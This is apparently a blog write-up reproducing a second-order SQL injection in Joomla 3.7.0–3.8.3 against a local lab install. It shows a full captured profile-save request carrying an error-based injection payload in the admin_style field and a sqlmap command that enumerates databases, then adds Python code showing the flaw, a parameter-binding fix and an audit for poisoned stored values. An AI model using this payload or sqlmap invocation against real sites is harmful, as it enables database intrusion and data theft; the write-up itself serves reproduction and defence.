  [Reproduction] Joomla second-order SQL injection

    Affected Joomla versions: 3.7.0 through 3.8.3

    1. Download and install Joomla 3.8.3, then log in to the administrator back end: http://127.0.0.1/joomla/administrator/index.php

    2. Open the edit-profile page:

    http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=769

    Click the Save button and capture the request. The value shown in red in the original (the `jform[params][admin_style][0]` field below) is the test payload:

    POST /joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771
    Content-Type: multipart/form-data; boundary=---------------------------132821454821567
    Content-Length: 1875
    Cookie: 52a41237bef72675e1ae3ded7fcac9e7=o4akcfu26k8ut4p2u3j0c31um5; b4ba6494ac7c9b13e2a8532fc8b0d563=giuboaa1n9rpocc0qbvg0agnn5
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[name]"
    
    savan
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[username]"
    
    savan
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[password2]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[password]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[email]"
    
    2@qq.com
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[registerDate]"
    
    2018-02-28 09:13:57
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[lastvisitDate]"
    
    2018-03-01 06:29:04
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[id]"
    
    771
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[params][admin_style][0]"
    
    extractvalue(1,concat(0x7e,(select version()) *))
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[params][admin_language]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[params][language]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[params][editor]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[params][helpsite]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="jform[params][timezone]"
    
    
    -----------------------------132821454821567
    Content-Disposition: form-data; name="task"
    
    profile.apply
    -----------------------------132821454821567
    Content-Disposition: form-data; name="f054a37efb023faabe817c77a5a97583"
    
    1
    -----------------------------132821454821567--

    3. Test the captured request with sqlmap:

    sqlmap.py -r C:\Users\18721\Desktop\1.txt --dbms mysql --tech E --second-order "http://127.0.0.1/joomla/administrator/index.php" --dbs --batch
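    What makes this a second-order injection is that the `admin_style` value is accepted at profile-save time, stored in the user's params JSON, and only reaches a query later when the admin template is looked up. The following is an added illustration of that stored-then-used pattern and of the defender-side checks (an integer cast at the point of use and an audit over stored params); it is not Joomla's code, and the table name, sample users and the `isis` template value are assumptions.

```python
"""Second-order injection pattern from the write-up above (generic illustration,
not Joomla's code): admin_style is accepted and stored at profile-save time and
only becomes dangerous when a later lookup concatenates it into SQL."""
import json
import re
import sqlite3

# Constructed sample user rows (not real Joomla data): one benign, one poisoned.
USERS = [
    (770, "alice", json.dumps({"admin_style": ["10"]})),
    (771, "savan", json.dumps({"admin_style": [
        "extractvalue(1,concat(0x7e,(select version()) *))"]})),
]

def make_demo_db() -> sqlite3.Connection:
    """Tiny stand-in for the template_styles table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE template_styles (id INTEGER, template TEXT)")
    conn.execute("INSERT INTO template_styles VALUES (10, 'isis')")
    return conn

def build_style_query_unsafe(params_json: str) -> str:
    """The flawed pattern: stored value dropped straight into the SQL text."""
    style = json.loads(params_json).get("admin_style", [""])[0]
    return "SELECT template FROM template_styles WHERE id = " + str(style)

def lookup_style_safe(conn, params_json: str):
    """Hardened: require an integer id at the point of use and bind it."""
    raw = str(json.loads(params_json).get("admin_style", [""])[0])
    if raw == "":
        return None  # no admin style chosen
    if not re.fullmatch(r"\d+", raw):
        raise ValueError(f"admin_style is not an integer id: {raw!r}")
    row = conn.execute("SELECT template FROM template_styles WHERE id = ?",
                       (int(raw),)).fetchone()
    return row[0] if row else None

def audit_admin_style(rows):
    """Detection: flag stored params whose admin_style is not a plain integer."""
    flagged = []
    for uid, name, params_json in rows:
        for value in json.loads(params_json).get("admin_style", []):
            if not re.fullmatch(r"\d*", str(value)):
                flagged.append((uid, name, value))
    return flagged

if __name__ == "__main__":
    print(build_style_query_unsafe(USERS[1][2]))   # payload lands in the SQL
    print(lookup_style_safe(make_demo_db(), USERS[0][2]))  # isis
    print(audit_admin_style(USERS))                # [(771, 'savan', '...')]
```

Running `audit_admin_style` over the real users table's `params` column is a quick way to find accounts whose profile already carries a non-numeric `admin_style` after an upgrade to a fixed version.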

  Original URL: https://www.cnblogs.com/peterpan0707007/p/8489368.html